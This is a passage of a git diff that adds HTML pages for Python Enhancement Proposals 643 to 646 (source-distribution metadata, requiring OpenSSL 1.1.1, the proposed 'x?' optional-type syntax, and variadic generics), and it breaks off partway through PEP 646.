The first published iteration of this proposal mostly followed PEP 634, but +suggested using ?EXPR for equality constraints and ?is EXPR for +identity constraints rather than PEP 634’s value patterns and literal patterns.

+

The second published iteration mostly adopted a counter-proposal from Steven +D’Aprano that kept the PEP 634 style inferred constraints in many situations, +but also allowed the use of == EXPR for explicit equality constraints, and +is EXPR for explicit identity constraints.

+

The third published (and current) iteration dropped inferred patterns entirely, +in an attempt to resolve the concerns with the fact that the patterns +case {key: NAME}: and case cls(attr=NAME): would both bind NAME +despite it appearing to the right of another subexpression without using the +as keyword. The revised proposal also eliminates the possibility of writing +case TARGET1 as TARGET2:, which would bind to both of the given names. Of +those changes, the most concerning was case cls(attr=TARGET_NAME):, since it +involved the use of = with the binding target on the right, the exact +opposite of what happens in assignment statements, function calls, and +function signature declarations.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0642.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0643/index.html b/pep-0643/index.html new file mode 100644 index 00000000000..0e3f7ed702f --- /dev/null +++ b/pep-0643/index.html @@ -0,0 +1,312 @@ + PEP 643 – Metadata for Package Source Distributions | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 643 – Metadata for Package Source Distributions

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
BDFL-Delegate:
+
Paul Ganssle <paul at ganssle.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
24-Oct-2020
+
Post-History:
+
24-Oct-2020, 01-Nov-2020, 02-Nov-2020, 14-Nov-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

Python package metadata is stored in the distribution file in a standard +format, defined in the Core Metadata Specification. However, for +source distributions, while the format of the data is defined, there has +traditionally been a lot of inconsistency in what data is recorded in +the source distribution. See here +for a discussion of this issue.

+

As a result, metadata consumers are unable to rely on the data available from source distributions, and need to use the (costly) PEP 517 build mechanisms to extract metadata.

+

This PEP defines a standard that allows build backends to reliably store +package metadata in the source distribution, while still retaining the +necessary flexibility to handle metadata fields that have to be calculated +at build time.

+
+
+

Motivation

+

There are a number of issues with the way that metadata is currently +stored in source distributions:

+
    +
  • The details of how to store metadata, while standardised, are not +easy to find.
  • +
  • The specification requires an old metadata version, and has not been +updated in line with changes to the core metadata spec.
  • +
  • There is no way in the spec to distinguish between “this field has been +omitted because its value will not be known until build time” and “this +field does not have a value”.
  • +
  • The core metadata specification allows most fields to be optional, +meaning that the previous issue affects nearly every metadata field.
  • +
+

This PEP proposes an update to the metadata specification to allow +recording of fields which are expected to be “filled in later”, and +updates the source distribution specification to clarify that backends +should record sdist metadata using that version of the spec (or later).

+
+
+

Rationale

+

This PEP allows projects to define source distribution metadata values +as being “dynamic”. In this context, saying that a field is “dynamic” +means that the value has not been fixed at the time that the source +distribution was generated. Dynamic values will be supplied by the build +backend at the time when the wheel is generated, and could depend on +details of the build environment.

+

PEP 621 has a similar concept, of “dynamic” values that will be +“filled in later”, and so we choose to use the same term here by +analogy.

+
+
+

Specification

+

This PEP defines the relationship between metadata values specified in a +source distribution, and the corresponding values in wheels built from +it. It requires build backends to clearly mark any fields which will +not simply be copied unchanged from the sdist to the wheel.

+

In addition, this PEP makes the PyPA Specifications document the +canonical location for the specification of the source distribution +format (collecting the information in PEP 517 and in this PEP).

+

A new field, Dynamic, will be added to the Core Metadata Specification. +This field will be multiple use, and will be allowed to contain the name +of another core metadata field.

+

When found in the metadata of a source distribution, the following +rules apply:

+
    +
  1. If a field is not marked as Dynamic, then the value of the field in any wheel built from the sdist MUST match the value in the sdist. If the field is not in the sdist, and not marked as Dynamic, then it MUST NOT be present in the wheel.

  2. If a field is marked as Dynamic, it may contain any valid value in a wheel built from the sdist (including not being present at all).

  3. Backends MUST NOT mark a field as Dynamic if they can determine that it was generated from data that will not change at build time.
+
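An illustrative PKG-INFO fragment for a source distribution (the project name and all field values here are hypothetical):

+
Metadata-Version: 2.2
+Name: examplepkg
+Version: 1.0.2
+Summary: An example package
+Dynamic: Requires-Dist
+Dynamic: Classifier
+
+

Under the rules above, Requires-Dist and Classifier may legitimately differ in wheels built from this sdist, while every other field (including Name and Version, which can never be dynamic) must be copied through unchanged.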

Backends MAY record the value they calculated for a field they mark as Dynamic in a source distribution. Consumers, however, MUST NOT treat this value as canonical, but MAY use it as a hint about what the final value in a wheel could be.

+

In any context other than a source distribution, if a field is marked as +Dynamic, that indicates that the value was generated at wheel build +time and may not match the value in the sdist (or in other builds of the +project). Backends are not required to record this information, though, +and consumers MUST NOT assume that the lack of a Dynamic marking has +any significance, except in a source distribution.

+

The fields Name and Version MUST NOT be marked as Dynamic.

+

As it adds a new metadata field, this PEP updates the core metadata +format to version 2.2.

+

Source distributions SHOULD use the latest version of the core metadata +specification that was available when they were created.

+

Build backends are strongly encouraged to only mark fields as +Dynamic when absolutely necessary, and to encourage projects to +avoid backend features that require the use of Dynamic. Projects +should prefer to use environment markers on static values to adapt to +details of the install location.

+
+
+

Backwards Compatibility

+

As this proposal increments the core metadata version, it is compatible +with existing source distributions, which will use an older metadata +version. Tools can determine whether a source distribution conforms to +this PEP by checking the metadata version.

+
+
+

Security Implications

+

As this specification is purely for the storage of data that is intended +to be publicly available, there are no security implications.

+
+
+

How to Teach This

+

This is a data storage format for project metadata, and so will not +typically be visible to end users. There is therefore no need to teach +users how to use the format. Developers wanting to reference the +metadata will be able to find the details in the PyPA Specifications.

+
+
+

Rejected Ideas

+
  1. Rather than marking fields as Dynamic, fields should be assumed to be dynamic unless explicitly marked as Static.

     This is logically equivalent to the current proposal, but it implies that fields being dynamic is the norm. Packaging tools can be much more efficient in the presence of metadata that is known to be static, so the PEP chooses to make dynamic fields the exception, and require backends to “opt in” to making a field dynamic.

     In addition, if dynamic is the default, then in future, as more and more metadata becomes static, metadata files will include an increasing number of Static declarations.

  2. Rather than having a Dynamic field, add a special value that indicates that a field is “not yet defined”.

     Again, this is logically equivalent to the current proposal. It makes “being dynamic” an explicit choice, but requires a special value. As some fields can contain arbitrary text, choosing such a value is somewhat awkward (although likely not a problem in practice). There does not seem to be enough benefit to this approach to make it worth using instead of the proposed mechanism.

  3. Special handling of Requires-Python.

     Early drafts of the PEP needed special discussion of Requires-Python, because the lack of environment markers for this field meant that it might be difficult to require it to be static. The final form of the PEP no longer needs this, as the idea of a whitelist of fields allowed to be dynamic was dropped.

  4. Restrict the use of Dynamic to a minimal “white list” of permitted fields.

     This approach was likely to prove extremely difficult for setuptools to implement in a backward-compatible way, due to the dynamic nature of the setuptools interface. Instead, the proposal now allows most fields to be dynamic, but encourages backends to avoid dynamic values unless essential.
+
+

Open Issues

+

None

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0643.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0644/index.html b/pep-0644/index.html new file mode 100644 index 00000000000..705a7011714 --- /dev/null +++ b/pep-0644/index.html @@ -0,0 +1,520 @@ PEP 644 – Require OpenSSL 1.1.1 or newer | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 644 – Require OpenSSL 1.1.1 or newer

+
+
Author:
+
Christian Heimes <christian at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Oct-2020
+
Python-Version:
+
3.10
+
Post-History:
+
27-Oct-2020, 03-Mar-2021, 17-Mar-2021, 17-Apr-2021
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

This PEP proposes that CPython’s standard library support only OpenSSL 1.1.1 LTS or newer. Support for OpenSSL versions past end-of-lifetime, for incompatible forks, and for other TLS libraries is dropped.

+
+
+

Motivation

+

Python makes use of OpenSSL in hashlib, hmac, and ssl modules. OpenSSL +provides fast implementations of cryptographic primitives and a full TLS +stack including handling of X.509 certificates. The ssl module is used by +standard library modules like urllib and 3rd party modules like urllib3 +to implement secure variants of internet protocols. pip uses the ssl +module to securely download packages from PyPI. Any bug in the ssl module’s +bindings to OpenSSL can lead to a severe security issue.

+

Over time OpenSSL’s public API has evolved and changed. Version 1.0.2 +introduced new APIs to verify and match hostnames. OpenSSL 1.1.0 made +internal structs opaque and introduced new APIs that replace direct access of +struct members. Version 3.0.0 will deprecate more APIs due to internal +reorganization that moves cryptographic algorithms out of the core and into +providers. Forks like LibreSSL and BoringSSL have diverged in different +directions.

+

Currently Python versions 3.6 to 3.9 are compatible with OpenSSL 1.0.2, +1.1.0, and 1.1.1. For the most part Python also works with LibreSSL >= 2.7.1 +with some missing features and broken tests.

+

Due to limited resources and time it becomes increasingly hard to support multiple versions and forks as well as test and verify correctness. Besides multiple incompatible APIs there are build time flags, distribution-specific patches, and local crypto-policy settings that add to the plethora of combinations. On the other hand, the Python core team has only a couple of domain experts who are familiar with TLS and OpenSSL internals and even fewer who are active maintainers.

+

Requiring OpenSSL 1.1.1 would allow us to give the vast majority of users a +better experience, reduce our maintenance overhead and thus free resources +to implement new features. Users would be able to rely on the presence of +new features and consistent behavior, ultimately resulting in a more robust +experience.

+
+
+

Impact

+

OpenSSL 1.1.1 is the default variant and version of OpenSSL on almost all +supported platforms and distributions. It’s also the only version that still +receives security support from upstream [9].

+

No macOS or Windows users will be affected by the deprecation. The python.org installer and alternative distributions like Conda ship with the most recent OpenSSL version.

+

As of October 2020 and according to DistroWatch [1] most current BSD and +Linux distributions ship with OpenSSL 1.1.1 as well. Some older releases of +long-term support (LTS) and enterprise distributions have older versions of +OpenSSL or LibreSSL. By the time Python 3.10 will be generally available, +several of these distributions will have reached end of lifetime, end of +general support, or moved from LibreSSL to OpenSSL.

+

Other software has dropped support for OpenSSL 1.0.2 as well. For example, +PyCA cryptography 3.2 (2020-10-25) removed compatibility with OpenSSL 1.0.2.

+
+

OpenSSL 1.0.2 LTS

+

released: 2015-02
end of lifetime: 2019-12

+

OpenSSL 1.0.2 added hostname verification, ALPN support, and elliptic curves.

+
  • CentOS 7 (EOL 2024-06)
  • Debian 8 Jessie (EOL 2020-07)
  • Linux Mint 18.3 (EOL 2021-04)
  • RHEL 7 (full support ends 2019-08, maintenance support 2 ends 2024-06)
  • SUSE Enterprise Linux 12-SP5 (general support ends 2024-10)
  • Ubuntu 16.04 LTS / Xenial (general support ends 2021-04)
+
+

OpenSSL 1.1.0

+

released: 2016-08
end of lifetime: 2019-09

+

OpenSSL 1.1.0 removed or disabled insecure ciphers by default and added +support for ChaCha20-Poly1305, BLAKE2 (basic features), X25519 and CT. The +majority of structs were made opaque and new APIs were introduced. OpenSSL +1.1.0 is not API compatible with 1.0.2.

+
  • Debian 9 Stretch (security support ended 2020-07, LTS until 2022-06)
  • Ubuntu 18.04 LTS / Bionic (general support ends 2023-04)
+
+

OpenSSL 1.1.1 LTS

+

released: 2018-08
end of lifetime: 2023-09 (planned)

+

OpenSSL 1.1.1 added TLS 1.3, SHA-3, X448 and Ed448.

+
  • Alpine (switched back to OpenSSL in 2018 [4])
  • Arch Linux current
  • CentOS 8.0+
  • Debian 10 Buster
  • Debian 11 Bullseye (ETA 2021-06)
  • Fedora 29+
  • FreeBSD 11.3+
  • Gentoo Linux stable (dropped LibreSSL as alternative in January 2021 [10])
  • HardenedBSD (switched back to OpenSSL in 2018 [3])
  • Linux Mint 19.3+
  • macOS (python.org installer)
  • NetBSD 8.2+
  • openSUSE 15.2+
  • RHEL 8.0+
  • Slackware current
  • SUSE Enterprise Linux 15-SP2
  • Ubuntu 18.10+
  • Ubuntu 20.04 LTS / Focal
  • VoidLinux (switched back to OpenSSL in March 2021 [5])
  • Windows (python.org installer, Conda)

Major CI providers provide images with OpenSSL 1.1.1.

+
  • AppVeyor (with image Ubuntu2004)
  • CircleCI (with recent cimg/base:stable or cimg/base:stable-20.04)
  • GitHub Actions (with runs-on: ubuntu-20.04)
  • GitLab CI (with Debian Stretch, Ubuntu Focal, CentOS 8, RHEL 8, or Fedora runner)
  • Packit
  • TravisCI (with dist: focal)
  • Zuul
+
+

OpenSSL 3.0.0

+

released: n/a (planned for mid/late 2021)

+

OpenSSL 3.0.0 is currently under development. Major changes include +relicensing to Apache License 2.0 and a new API for cryptographic algorithms +providers. Most changes are internal refactorings and don’t affect public +APIs. [8]

+
+
+

LibreSSL

+

created: 2014-04 (forked from OpenSSL 1.0.1g)

+
  • DragonFly BSD
  • Hyperbola GNU/Linux-libre
  • OpenBSD
  • OpenELEC (discontinued)
  • TrueOS (discontinued)

Some distributions like FreeBSD and OPNsense also feature LibreSSL +instead of OpenSSL as non-standard TLS libraries. Gentoo discontinued +LibreSSL as an alternative to OpenSSL in January 2021 [10] due to +compatibility issues and little testing.

+

OpenBSD ports has a port security/openssl/1.1 which is documented as +“[…] is present to provide support for applications which cannot be made +compatible with LibReSSL” [7]. The package could be used by OpenBSD to +provide a working ssl module.

+
+
+

BoringSSL

+

created: 2014-06

+

BoringSSL is Google’s fork of OpenSSL. It’s not intended for general use and +therefore not supported by Python. There are no guarantees of API or ABI +stability. Vendored copies of BoringSSL are used in Chrome/Chromium browser, +Android, and on Apple platforms [6].

+
+
+
+

Benefits

+
+

TLS 1.3

+

OpenSSL 1.1.1 introduced support for the new TLS 1.3 version. The latest +version of the TLS protocol has a faster handshake and is more secure than +the previous versions.
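For example, with OpenSSL 1.1.1 the ssl module can require TLS 1.3 outright; a minimal sketch:

import ssl

ctx = ssl.create_default_context()
# TLSVersion and minimum_version are available in Python 3.7+;
# enforcing TLS 1.3 only works when the linked OpenSSL supports it.
ctx.minimum_version = ssl.TLSVersion.TLSv1_3
print(ssl.HAS_TLSv1_3)  # True when linked against OpenSSL 1.1.1+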

+
+
+

Thread and fork safety

+

Starting with release 1.1.0c, OpenSSL is fully fork and thread safe. +Bindings no longer need any workarounds or additional callbacks to support +multithreading.

+
+
+

SHA-3

+

Since 1.1.0, OpenSSL ships with SHA-3 and SHAKE implementations. Python’s builtin SHA-3 support is based on the reference implementation. The internal _sha3 code is fairly large, and the resulting shared library is close to 0.5 MB. Python could drop the builtin implementation and rely on OpenSSL’s libcrypto instead.

+

So far LibreSSL upstream development has refused to add SHA-3 support. [2]

+
+
+
+

Compatibility

+
+

OpenSSL downstream patches and options

+

OpenSSL features more than 70 configure and build time options in the form of OPENSSL_NO_* macros. Around 60 options affect the presence of features like cryptographic algorithms and TLS versions. Some distributions apply patches to alter settings. Furthermore, default values for settings like security level, ciphers, TLS version range, and signature algorithms can be set in the OpenSSL config file.

+

The Python core team lacks resources to test all possible combinations. +This PEP proposes that Python only supports OpenSSL builds that have +standard features enabled. Vendors shall disable deprecated or insecure +algorithms and TLS versions with build time options like +OPENSSL_NO_TLS1_1_METHOD or OpenSSL config options like +MinProtocol = TLSv1.2.

+

Python assumes that OpenSSL is built with

+
  • hashlib’s default algorithms such as MD5, SHA-1, the SHA-2 family, the SHA-3/SHAKE family, and BLAKE2
  • the TLS 1.2 and TLS 1.3 protocols
  • current key agreement, signature, and encryption algorithms for TLS 1.2 and 1.3 (ECDH, RSA, ECDSA, Curve25519, AES, Poly1305-ChaCha20, …)
  • threading, file I/O, socket I/O, and error messages

Weak algorithms (MD5, SHA-1 signatures) and short keys (RSA < 2048 bits) may be disabled at runtime. Algorithms may also be blocked when they are disabled by a crypto policy such as FIPS. The PEP is deliberately not more specific, to give room for new features as well as countermeasures against vulnerabilities. As a rule of thumb, Python should be able to connect to PyPI and the test suite should pass.
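As a rough smoke test of these assumptions, the relevant build information is visible at runtime (the output shown is illustrative and depends on the local OpenSSL build):

import hashlib
import ssl

print(ssl.OPENSSL_VERSION)   # e.g. 'OpenSSL 1.1.1k  25 Mar 2021'
print(ssl.HAS_TLSv1_3)       # expected to be True
print(hashlib.sha3_256(b"abc").hexdigest())  # SHA-3, builtin or via OpenSSL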

+
+
+

LibreSSL support

+

LibreSSL is a fork of OpenSSL. The fork was created off OpenSSL 1.0.1g by +members of the OpenBSD team in 2014 in light of the heartbleed vulnerability. +Since its inception several features deemed problematic or insecure were +removed or replaced (SSL 2.0, SSL 3.0, improved CPRNG) or backported +from OpenSSL and BoringSSL.

+

At the moment LibreSSL is not fully API compatible with OpenSSL 1.1.1. The latest release, LibreSSL 3.3.2, is missing features and behaves differently in some cases. Notable missing or incompatible features include

+
  • SHA-3, SHAKE, BLAKE2
  • SSL_CERT_* environment variables
  • security level APIs
  • session handling APIs
  • key logging API
  • verified cert chain APIs
  • OPENSSL_VERSION macro

This PEP proposes to remove any and all LibreSSL-related workarounds from Python. In the future Python will not actively prohibit LibreSSL support with configure and compile time checks. But Python will not accept patches that add non-trivial workarounds or disable tests either.

+
+
+

BoringSSL

+

There are currently no plans to support BoringSSL.

+
+
+
+

Rejected Ideas

+
+

Formalize supported OpenSSL versions

+

This PEP does not provide a set of formal rules and conditions under which +an OpenSSL version is supported.

+

In general Python aims to be compatible with commonly used and officially +supported OpenSSL versions. Patch releases of Python may not be compatible +with new major releases of OpenSSL. Users should not expect that a new major +or minor release of Python works with an OpenSSL version that is past its +end-of-lifetime. Python core development may backport fixes for new releases +or extend compatibility with EOLed releases as we see fit.

+

The new ABI stability and LTS policies of OpenSSL [9] should help, too.

+
+
+

Keep support for OpenSSL 1.1.0

+

It was suggested to keep support for OpenSSL 1.1.0 for compatibility with Debian 9 (Stretch). The proposal was rejected since it would complicate code cleanup and testing. Stretch is already out of regular security support and close to the end of long-term support. By the time of the Python 3.10 final release, Debian Buster and Debian Bullseye will be available.

+

Instead, Python 3.10 will gain additional documentation and a new configure option --with-openssl-rpath=auto to simplify the use of custom OpenSSL builds [11].
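Usage might look like this (the installation prefix is purely illustrative):

./configure --with-openssl=/opt/custom-openssl --with-openssl-rpath=auto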

+
+
+
+

Backwards Compatibility

+

Python 3.10 will no longer support TLS/SSL and fast hashing on platforms with OpenSSL 1.0.2 or LibreSSL. The first draft of this PEP was published at the beginning of the 3.10 release cycle to give vendors like Linux distributors or CI providers sufficient time to plan.

+

Python’s internal copy of the Keccak Code Package and the internal _sha3 module will be removed. This will reduce source code size by about 280 kB and code size by roughly 0.5 MB. The hashlib module will rely solely on OpenSSL’s SHA-3 implementation. SHA-3 and SHAKE will no longer be available without OpenSSL.

+
+
+

Disclaimer and special thanks

+

The author of this PEP is a contributor to the OpenSSL project and is employed by a major Linux distributor that uses OpenSSL.

+

Thanks to Alex Gaynor, Gregory P. Smith, Nathaniel J. Smith, Paul Kehrer, +and Seth Larson for their review and feedback on the initial draft.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0644.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0645/index.html b/pep-0645/index.html new file mode 100644 index 00000000000..cde5846fb99 --- /dev/null +++ b/pep-0645/index.html @@ -0,0 +1,251 @@ PEP 645 – Allow writing optional types as x? | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 645 – Allow writing optional types as x?

+
+
Author:
+
Maggie Moss <maggiebmoss at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
25-Aug-2020
+
Resolution:
+
Typing-SIG message
+
+
+
+
+
+

Abstract

+

This PEP proposes adding a ? operator for types to allow writing int? in place of Optional[int].

+
+
+

PEP Withdrawal

+

The notation T|None introduced by PEP 604 to write Optional[T] is a +fine alternative to T? and does not require new syntax.
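For example, what this PEP would have spelled str? is already expressible as:

def greet(name: str | None = None) -> str:
    return f"Hello, {name or 'world'}!"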

+

Using T? to mean T|None is also inconsistent with TypeScript +where it roughly means NotRequired[T]. +Such inconsistency would likely confuse folks coming from TypeScript to Python.

+

The above represents the consensus of +typing-sig +and the sponsor of this PEP.

+
+
+

Motivation

+

Types have become a valuable and powerful part of the Python language. However, many type annotations are verbose and add considerable friction to using them. By improving the typing syntax, adding types to Python code becomes simpler and improves the development experience for Python users.

+

In a similar vein, a PEP to introduce shorthand syntax for Union types has been approved and implemented.

+
+
+

Rationale

+

Types in Python can be quite verbose; this can be a hindrance when working towards type adoption. Making types more ergonomic, as was done with the Union type in PEP 604 (e.g., int | str), would reduce the effort needed to add types to new and existing Python code. The Optional annotation is used frequently in both partially and fully typed Python code bases. In a small sampling of 5 well-typed open source projects, on average 7% of annotations included at least one optional type. This indicates that updating the syntax has the potential to make types more concise, reduce code length and improve readability.

+

Simplifying the syntax for optionals has been discussed previously within the typing community. +The consensus during these conversations has been that ? is the preferred operator. There is no native support for unary ? in Python and this will +need to be added to the runtime.

+

Adding the ? sigil to the Python grammar has been proposed previously in PEP 505, which is currently in a deferred state. PEP 505 proposes:

  • a “None coalescing” binary operator ??
  • a “None-aware attribute access” operator ?. (“maybe dot”)
  • a “None-aware indexing” operator ?[] (“maybe subscript”)
+

Should PEP 505 be approved in the future, it would not interfere with the typing-specific ? proposed in this PEP. Moreover, since all uses of ? would be conceptually related, it would not be confusing in terms of learning Python, nor a hindrance to quick visual comprehension.

+

The proposed syntax, with the postfix operator, mimics the optional syntax found in other typed languages, like C#, TypeScript and Swift. +The widespread adoption and popularity of these languages means that Python developers are likely already familiar with this syntax.

+
// Optional in Swift
+var example: String?
+
+// Optional in C#
+string? example;
+
+
+

Adding this syntax would also follow the often used pattern of using builtin types as annotations. For example, list, dict and None. This would allow more annotations to be +added to Python code without importing from typing.

+
+
+

Specification

+

The new optional syntax should be accepted for function, variable, attribute and parameter annotations.

+
# instead of
# def foo(x: Optional[int], y: Optional[str], z: Optional[list[int]]): ...
def foo(x: int?, y: str?, z: list[int]?): ...

# def bar(x: list[typing.Optional[int]]): ...
def bar(x: list[int?]): ...
+
+
+

The new optional syntax should be equivalent to the existing typing.Optional syntax

+
typing.Optional[int] == int?
+
+
+

The new optional syntax should have the same identity as the existing typing.Optional syntax.

+
typing.Optional[int] is int?
+
+
+

It should also be equivalent to a Union with None.

+
# old syntax
+int? == typing.Union[int, None]
+
+# new syntax
+int? == int | None
+
+
+

Since the new Union syntax specified in PEP 604 is supported in isinstance and issubclass, the new optional syntax should be supported in both isinstance and issubclass:

+
isinstance(1, int?) # true
+issubclass(Child, Super?) # true
+
+
+

A new dunder method will need to be implemented to allow the ? operator to be overloaded for other functionality.
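The PEP does not name or specify that method; purely as a hypothetical sketch, a metaclass-level hook might have looked something like this (the name __optional__ is invented for illustration):

class OptionalMeta(type):
    def __optional__(cls):
        # Hypothetical: evaluate 'cls?' as 'cls | None' by default.
        return cls | None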

+
+
+

Backwards Compatibility

+

? is currently unused in Python syntax; therefore, this PEP is fully backwards compatible.

+
+
+

Reference Implementation

+

A reference implementation can be found here.

+
+
+

Rejected Ideas

+

Discussed alternatives were

+
  • The ~ operator was considered in place of ?.
  • A prefix operator (?int).
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0645.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0646/index.html b/pep-0646/index.html new file mode 100644 index 00000000000..3aac52cacb2 --- /dev/null +++ b/pep-0646/index.html @@ -0,0 +1,1703 @@ PEP 646 – Variadic Generics | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 646 – Variadic Generics

+
+
Author:
+
Mark Mendoza <mendoza.mark.a at gmail.com>, +Matthew Rahtz <mrahtz at google.com>, +Pradeep Kumar Srinivasan <gohanpra at gmail.com>, +Vincent Siles <vsiles at fb.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
16-Sep-2020
+
Python-Version:
+
3.11
+
Post-History:
+
07-Oct-2020, 23-Dec-2020, 29-Dec-2020
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at TypeVarTuple and typing.TypeVarTuple.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

PEP 484 introduced TypeVar, enabling creation of generics parameterised +with a single type. In this PEP, we introduce TypeVarTuple, enabling parameterisation +with an arbitrary number of types - that is, a variadic type variable, +enabling variadic generics. This enables a wide variety of use cases. +In particular, it allows the type of array-like structures +in numerical computing libraries such as NumPy and TensorFlow to be +parameterised with the array shape, enabling static type checkers +to catch shape-related bugs in code that uses these libraries.

+
+
+

Acceptance

+

This PEP was accepted for Python 3.11, with the caveat that details around +multiple unpackings in a type expression aren’t specified precisely. +This gives individual type checkers some leeway, but can be tightened +in future PEPs.

+
+
+

Motivation

+

Variadic generics have long been a requested feature, for a myriad of +use cases [4]. One particular use case - a use case with potentially +large impact, and the main case this PEP targets - concerns typing in +numerical libraries.

+

In the context of numerical computation with libraries such as NumPy and TensorFlow, +the shape of variables is often just as important as the variable type. +For example, consider the following function which converts a batch [1] +of videos to grayscale:

+
def to_gray(videos: Array): ...
+
+
+

From the signature alone, it is not obvious what shape of array [2] +we should pass for the videos argument. Possibilities include, for +example,

+
+
batch × time × height × width × channels
+

and

+
+
time × batch × channels × height × width. [3]
+

This is important for three reasons:

+
  • Documentation. Without the required shape being clear in the signature, the user must hunt in the docstring or the code in question to determine what the input/output shape requirements are.
  • Catching shape bugs before runtime. Ideally, use of incorrect shapes should be an error we can catch ahead of time using static analysis. (This is particularly important for machine learning code, where iteration times can be slow.)
  • Preventing subtle shape bugs. In the worst case, use of the wrong shape will result in the program appearing to run fine, but with a subtle bug that can take days to track down. (See this exercise in a popular machine learning tutorial for a particularly pernicious example.)

Ideally, we should have some way of making shape requirements explicit in +type signatures. Multiple proposals [6] [7] +[9] have suggested the use of the standard generics syntax for +this purpose. We would write:

+
def to_gray(videos: Array[Time, Batch, Height, Width, Channels]): ...
+
+
+

However, note that arrays can be of arbitrary rank - Array as used above is +generic in an arbitrary number of axes. One way around this would be to use a different +Array class for each rank…

+
Axis1 = TypeVar('Axis1')
+Axis2 = TypeVar('Axis2')
+
+class Array1(Generic[Axis1]): ...
+
+class Array2(Generic[Axis1, Axis2]): ...
+
+
+

…but this would be cumbersome, both for users (who would have to sprinkle 1s and 2s +and so on throughout their code) and for the authors of array libraries (who would have to duplicate implementations throughout multiple classes).

+

Variadic generics are necessary for an Array that is generic in an arbitrary +number of axes to be cleanly defined as a single class.

+
+
+

Summary Examples

+

Cutting right to the chase, this PEP allows an Array class that is generic +in its shape (and datatype) to be defined using a newly-introduced +arbitrary-length type variable, TypeVarTuple, as follows:

+
from typing import TypeVar, TypeVarTuple
+
+DType = TypeVar('DType')
+Shape = TypeVarTuple('Shape')
+
+class Array(Generic[DType, *Shape]):
+
+    def __abs__(self) -> Array[DType, *Shape]: ...
+
+    def __add__(self, other: Array[DType, *Shape]) -> Array[DType, *Shape]: ...
+
+
+

Such an Array can be used to support a number of different kinds of +shape annotations. For example, we can add labels describing the +semantic meaning of each axis:

+
from typing import NewType
+
+Height = NewType('Height', int)
+Width = NewType('Width', int)
+
+x: Array[float, Height, Width] = Array()
+
+
+

We could also add annotations describing the actual size of each axis:

+
from typing import Literal as L
+
+
+x: Array[float, L[480], L[640]] = Array()
+
+
+

For consistency, we use semantic axis annotations as the basis of the examples +in this PEP, but this PEP is agnostic about which of these two (or possibly other) +ways of using Array is preferable; that decision is left to library authors.

+

(Note also that for the rest of this PEP, for conciseness of example, we use +a simpler version of Array which is generic only in the shape - not the +data type.)

+
+
+

Specification

+

In order to support the above use cases, we introduce +TypeVarTuple. This serves as a placeholder not for a single type +but for a tuple of types.

+

In addition, we introduce a new use for the star operator: to ‘unpack’ +TypeVarTuple instances and tuple types such as Tuple[int, +str]. Unpacking a TypeVarTuple or tuple type is the typing +equivalent of unpacking a variable or a tuple of values.

+
+

Type Variable Tuples

+

In the same way that a normal type variable is a stand-in for a single +type such as int, a type variable tuple is a stand-in for a tuple type such as +Tuple[int, str].

+

Type variable tuples are created with:

+
from typing import TypeVarTuple
+
+Ts = TypeVarTuple('Ts')
+
+
+
+

Using Type Variable Tuples in Generic Classes

+

Type variable tuples behave like a number of individual type variables packed in a +Tuple. To understand this, consider the following example:

+
Shape = TypeVarTuple('Shape')
+
+class Array(Generic[*Shape]): ...
+
+Height = NewType('Height', int)
+Width = NewType('Width', int)
+x: Array[Height, Width] = Array()
+
+
+

The Shape type variable tuple here behaves like Tuple[T1, T2], +where T1 and T2 are type variables. To use these type variables +as type parameters of Array, we must unpack the type variable tuple using +the star operator: *Shape. The signature of Array then behaves +as if we had simply written class Array(Generic[T1, T2]): ....

+

In contrast to Generic[T1, T2], however, Generic[*Shape] allows +us to parameterise the class with an arbitrary number of type parameters. +That is, in addition to being able to define rank-2 arrays such as +Array[Height, Width], we could also define rank-3 arrays, rank-4 arrays, +and so on:

+
Time = NewType('Time', int)
+Batch = NewType('Batch', int)
+y: Array[Batch, Height, Width] = Array()
+z: Array[Time, Batch, Height, Width] = Array()
+
+
+
+
+

Using Type Variable Tuples in Functions

+

Type variable tuples can be used anywhere a normal TypeVar can. +This includes class definitions, as shown above, as well as function +signatures and variable annotations:

+
class Array(Generic[*Shape]):
+
+    def __init__(self, shape: Tuple[*Shape]):
+        self._shape: Tuple[*Shape] = shape
+
+    def get_shape(self) -> Tuple[*Shape]:
+        return self._shape
+
+shape = (Height(480), Width(640))
+x: Array[Height, Width] = Array(shape)
+y = abs(x)  # Inferred type is Array[Height, Width]
+z = x + x   #        ...    is Array[Height, Width]
+
+
+
+
+

Type Variable Tuples Must Always be Unpacked

+

